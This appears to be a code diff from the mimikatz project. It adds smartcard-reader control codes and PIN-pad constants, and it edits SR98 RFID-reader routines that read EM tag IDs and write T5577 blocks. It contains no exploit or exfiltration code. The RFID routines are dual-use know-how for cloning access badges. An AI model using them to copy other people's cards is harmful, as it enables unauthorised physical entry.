extern WINSETUPAPI BOOL WINAPI SetupDiEnumDeviceInterfaces(__in HDEVINFO DeviceInfoSet, __in_opt PSP_DEVINFO_DATA DeviceInfoData, __in CONST GUID *InterfaceClassGuid, __in DWORD MemberIndex, __out PSP_DEVICE_INTERFACE_DATA DeviceInterfaceData);
|
||||
extern WINSETUPAPI BOOL WINAPI SetupDiGetDeviceInterfaceDetailW( __in HDEVINFO DeviceInfoSet, __in PSP_DEVICE_INTERFACE_DATA DeviceInterfaceData, __out_bcount_opt(DeviceInterfaceDetailDataSize) PSP_DEVICE_INTERFACE_DETAIL_DATA_W DeviceInterfaceDetailData, __in DWORD DeviceInterfaceDetailDataSize, __out_opt PDWORD RequiredSize, __out_opt PSP_DEVINFO_DATA DeviceInfoData);
|
||||
extern WINSETUPAPI BOOL WINAPI SetupDiDestroyDeviceInfoList(__in HDEVINFO DeviceInfoSet);
|
||||
extern WINSETUPAPI BOOL SetupDiGetDeviceRegistryPropertyW(__in HDEVINFO DeviceInfoSet, __in PSP_DEVINFO_DATA DeviceInfoData, __in DWORD Property, __out_opt PDWORD PropertyRegDataType, __out_opt PBYTE PropertyBuffer, __in DWORD PropertyBufferSize, __out_opt PDWORD RequiredSize);
|
||||
extern WINSETUPAPI BOOL SetupDiEnumDeviceInfo(__in HDEVINFO DeviceInfoSet, __in DWORD MemberIndex, __out PSP_DEVINFO_DATA DeviceInfoData);
|
||||
|
||||
#define SetupDiGetClassDevs SetupDiGetClassDevsW
|
||||
#define SetupDiGetDeviceInterfaceDetail SetupDiGetDeviceInterfaceDetailW
|
||||
#define SetupDiGetDeviceRegistryProperty SetupDiGetDeviceRegistryPropertyW
|
||||
#include <poppack.h>
|
||||
@ -127,4 +127,87 @@ PKIWI_DH kull_m_crypto_dh_Delete(PKIWI_DH dh);
|
||||
PKIWI_DH kull_m_crypto_dh_Create(ALG_ID targetSessionKeyType);
|
||||
BOOL kull_m_crypto_dh_CreateSessionKey(PKIWI_DH dh, PMIMI_PUBLICKEY publicKey);
|
||||
BOOL kull_m_crypto_dh_simpleEncrypt(HCRYPTKEY key, LPVOID data, DWORD dataLen, LPVOID *out, DWORD *outLen);
|
||||
BOOL kull_m_crypto_dh_simpleDecrypt(HCRYPTKEY key, LPVOID data, DWORD dataLen, LPVOID *out, DWORD *outLen);
|
||||
BOOL kull_m_crypto_dh_simpleDecrypt(HCRYPTKEY key, LPVOID data, DWORD dataLen, LPVOID *out, DWORD *outLen);
|
||||
|
||||
#define IOCTL_GET_FEATURE_REQUEST SCARD_CTL_CODE(3400)
|
||||
#define IOCTL_CCID_ESCAPE SCARD_CTL_CODE(3500)
|
||||
|
||||
// ACS
|
||||
#define IOCTL_SMARTCARD_DIRECT SCARD_CTL_CODE(2050)
|
||||
#define IOCTL_SMARTCARD_SELECT_SLOT SCARD_CTL_CODE(2051)
|
||||
#define IOCTL_SMARTCARD_DRAW_LCDBMP SCARD_CTL_CODE(2052)
|
||||
#define IOCTL_SMARTCARD_DISPLAY_LCD SCARD_CTL_CODE(2053)
|
||||
#define IOCTL_SMARTCARD_CLR_LCD SCARD_CTL_CODE(2054)
|
||||
#define IOCTL_SMARTCARD_READ_KEYPAD SCARD_CTL_CODE(2055)
|
||||
#define IOCTL_SMARTCARD_READ_MAGSTRIP SCARD_CTL_CODE(2056)
|
||||
#define IOCTL_SMARTCARD_READ_RTC SCARD_CTL_CODE(2057)
|
||||
#define IOCTL_SMARTCARD_SET_RTC SCARD_CTL_CODE(2058)
|
||||
#define IOCTL_SMARTCARD_SET_OPTION SCARD_CTL_CODE(2059)
|
||||
#define IOCTL_SMARTCARD_SET_LED SCARD_CTL_CODE(2060)
|
||||
#define IOCTL_SMARTCARD_USE_ENCRYPTION SCARD_CTL_CODE(2061)
|
||||
#define IOCTL_SMARTCARD_LOAD_KEY SCARD_CTL_CODE(2062)
|
||||
#define IOCTL_SMARTCARD_COMPUTE_MAC SCARD_CTL_CODE(2063)
|
||||
#define IOCTL_SMARTCARD_DECRYPT_MAC SCARD_CTL_CODE(2064)
|
||||
#define IOCTL_SMARTCARD_READ_EEPROM SCARD_CTL_CODE(2065)
|
||||
#define IOCTL_SMARTCARD_WRITE_EEPROM SCARD_CTL_CODE(2066)
|
||||
#define IOCTL_SMARTCARD_GET_VERSION SCARD_CTL_CODE(2067)
|
||||
#define IOCTL_SMARTCARD_DUKPT_INIT_KEY SCARD_CTL_CODE(2069)
|
||||
#define IOCTL_SMARTCARD_ABORD_DUKPT_PIN SCARD_CTL_CODE(2070)
|
||||
#define IOCTL_SMARTCARD_SET_USB_VIDPID SCARD_CTL_CODE(2071)
|
||||
#define IOCTL_SMARTCARD_ACR128_ESCAPE_COMMAND SCARD_CTL_CODE(2079)
|
||||
|
||||
#define IOCTL_SMARTCARD_GET_READER_INFO SCARD_CTL_CODE(2051)
|
||||
#define IOCTL_SMARTCARD_SET_CARD_TYPE SCARD_CTL_CODE(2060)
|
||||
|
||||
// CYBERJACK
|
||||
#define CJPCSC_VEN_IOCTRL_ESCAPE SCARD_CTL_CODE(3103)
|
||||
#define CJPCSC_VEN_IOCTRL_VERIFY_PIN_DIRECT SCARD_CTL_CODE(3506)
|
||||
#define CJPCSC_VEN_IOCTRL_MODIFY_PIN_DIRECT SCARD_CTL_CODE(3507)
|
||||
#define CJPCSC_VEN_IOCTRL_MCT_READERDIRECT SCARD_CTL_CODE(3508)
|
||||
#define CJPCSC_VEN_IOCTRL_MCT_READERUNIVERSAL SCARD_CTL_CODE(3509)
|
||||
#define CJPCSC_VEN_IOCTRL_EXECUTE_PACE SCARD_CTL_CODE(3532)
|
||||
#define CJPCSC_VEN_IOCTRL_SET_NORM SCARD_CTL_CODE(3154)
|
||||
|
||||
// OMNIKEY
|
||||
#define CM_IOCTL_GET_FW_VERSION SCARD_CTL_CODE(3001)
|
||||
#define CM_IOCTL_GET_LIB_VERSION SCARD_CTL_CODE(3041) // not in doc
|
||||
#define CM_IOCTL_SIGNAL SCARD_CTL_CODE(3058)
|
||||
#define CM_IOCTL_RFID_GENERIC SCARD_CTL_CODE(3105)
|
||||
#define CM_IOCTL_SET_OPERATION_MODE SCARD_CTL_CODE(3107)
|
||||
#define CM_IOCTL_GET_MAXIMUM_RFID_BAUDRATE SCARD_CTL_CODE(3208)
|
||||
#define CM_IOCTL_SET_RFID_CONTROL_FLAGS SCARD_CTL_CODE(3213)
|
||||
#define CM_IOCTL_GET_SET_RFID_BAUDRATE SCARD_CTL_CODE(3215)
|
||||
|
||||
// GEMALTO
|
||||
#define IOCTL_VENDOR_IFD_EXCHANGE SCARD_CTL_CODE(2058)
|
||||
#define IOCTL_SMARTCARD_PC_SC_VERIFY_PIN SCARD_CTL_CODE(2060)
|
||||
#define IOCTL_SMARTCARD_PC_SC_MODIFY_PIN SCARD_CTL_CODE(2061)
|
||||
|
||||
#define FEATURE_VERIFY_PIN_START 0x01
|
||||
#define FEATURE_VERIFY_PIN_FINISH 0x02
|
||||
#define FEATURE_MODIFY_PIN_START 0x03
|
||||
#define FEATURE_MODIFY_PIN_FINISH 0x04
|
||||
#define FEATURE_GET_KEY_PRESSED 0x05
|
||||
#define FEATURE_VERIFY_PIN_DIRECT 0x06
|
||||
#define FEATURE_MODIFY_PIN_DIRECT 0x07
|
||||
#define FEATURE_MCT_READER_DIRECT 0x08
|
||||
#define FEATURE_MCT_UNIVERSAL 0x09
|
||||
#define FEATURE_IFD_PIN_PROP 0x0a
|
||||
#define FEATURE_ABORT 0x0b
|
||||
#define FEATURE_SET_SPE_MESSAGE 0x0c
|
||||
#define FEATURE_VERIFY_PIN_DIRECT_APP_ID 0x0d
|
||||
#define FEATURE_MODIFY_PIN_DIRECT_APP_ID 0x0e
|
||||
#define FEATURE_WRITE_DISPLAY 0x0f
|
||||
#define FEATURE_GET_KEY 0x10
|
||||
#define FEATURE_IFD_DISPLAY_PROPERTIES 0x11
|
||||
#define FEATURE_GET_TLV_PROPERTIES 0x12
|
||||
#define FEATURE_CCID_ESC_COMMAND 0x13
|
||||
#define FEATURE_EXECUTE_PACE 0x20
|
||||
|
||||
#pragma pack(push, 1)
|
||||
typedef struct _KIWI_TLV_FEATURE {
|
||||
BYTE Tag;
|
||||
BYTE Length; // 4
|
||||
DWORD ControlCode; // BE
|
||||
} KIWI_TLV_FEATURE, *PKIWI_TLV_FEATURE;
|
||||
#pragma pack(pop)
|
||||
@ -176,7 +176,6 @@ BOOL kull_m_file_Find(PCWCHAR directory, PCWCHAR filter, BOOL isRecursive /*TODO
|
||||
{
|
||||
if(isPrintInfos)
|
||||
kprintf(L"%*s" L"%3u %c|'%s\'\n", level << 1, L"", level, (fData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) ? L'D' : L'F' , fData.cFileName);
|
||||
|
||||
if(!(fData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY))
|
||||
{
|
||||
if(callback)
|
||||
|
||||
@ -8,7 +8,7 @@
|
||||
BOOL sr98_test_device(HANDLE hFile)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
USHORT temoin = 0x4242;
|
||||
USHORT temoin = 'BB';
|
||||
BYTE *out, szOut;
|
||||
if(sr98_send_receive(hFile, SR98_IOCTL_TEST_DEVICE, &temoin, sizeof(temoin), &out, &szOut))
|
||||
{
|
||||
@ -23,6 +23,13 @@ BOOL sr98_test_device(HANDLE hFile)
|
||||
return status;
|
||||
}
|
||||
|
||||
BOOL sr98_beep(HANDLE hFile, BYTE duration)
|
||||
{
|
||||
if(duration > 9)
|
||||
duration = 9;
|
||||
return sr98_send_receive(hFile, SR98_IOCTL_BEEP, &duration, 1, NULL, NULL);
|
||||
}
|
||||
|
||||
BOOL sr98_read_emid(HANDLE hFile, BYTE emid[5])
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
@ -47,13 +54,13 @@ BOOL sr98_t5577_write_block(HANDLE hFile, BYTE page, BYTE block, DWORD data, BYT
|
||||
//if(lockBit) // ????
|
||||
// blockContent[1] |= SR98_T5577_LOCKBIT_MASK
|
||||
|
||||
*(PDWORD) (blockContent + 2) = data;
|
||||
*(PDWORD) (blockContent + 2) = data;
|
||||
blockContent[6] = block & 7;
|
||||
|
||||
if(isPassword)
|
||||
{
|
||||
blockContent[0] = SR98_SUB_IOCTL_T5577_WRITE_BLOCK_PASS;
|
||||
*(PDWORD) (blockContent + 7) = password;
|
||||
*(PDWORD) (blockContent + 7) = password;
|
||||
}
|
||||
|
||||
if(sr98_send_receive(hFile, SR98_IOCTL_T5577, blockContent, isPassword ? sizeof(blockContent) : sizeof(blockContent) - sizeof(DWORD), &out, &szOut))
|
||||
@ -102,9 +109,9 @@ BOOL sr98_send_receive(HANDLE hFile, BYTE ctl, LPCVOID in, BYTE szIn, LPBYTE *ou
|
||||
BYTE i, crc, inBuffer[24] = {0x03, 0x01, 5 + szIn}, outBuffer[256] = {0}, szBuffer;
|
||||
DWORD ret;
|
||||
|
||||
kprintf(L"> ");
|
||||
kull_m_string_wprintf_hex(in, szIn, 1);
|
||||
kprintf(L"\n");
|
||||
//kprintf(L"> ");
|
||||
//kull_m_string_wprintf_hex(in, szIn, 1);
|
||||
//kprintf(L"\n");
|
||||
if(szIn < (24 - 6))
|
||||
{
|
||||
inBuffer[3] = ctl;
|
||||
@ -142,16 +149,16 @@ BOOL sr98_send_receive(HANDLE hFile, BYTE ctl, LPCVOID in, BYTE szIn, LPBYTE *ou
|
||||
if((outBuffer[4 + szBuffer] == crc) && (outBuffer[5 + szBuffer] == 0x04))
|
||||
{
|
||||
status = TRUE;
|
||||
if(out && szOut)
|
||||
if(szBuffer && out && szOut)
|
||||
{
|
||||
*szOut = szBuffer;
|
||||
if(*out = (PBYTE) LocalAlloc(LPTR, szBuffer))
|
||||
RtlCopyMemory(*out, outBuffer + 4, szBuffer);
|
||||
else status = FALSE;
|
||||
}
|
||||
kprintf(L"< ");
|
||||
kull_m_string_wprintf_hex(outBuffer + 4, szBuffer, 1);
|
||||
kprintf(L"\n");
|
||||
//kprintf(L"< ");
|
||||
//kull_m_string_wprintf_hex(outBuffer + 4, szBuffer, 1);
|
||||
//kprintf(L"\n");
|
||||
}
|
||||
else PRINT_ERROR(L"Bad CRC/data\n");
|
||||
}
|
||||
|
||||
Loading…
Reference in New Issue
Block a user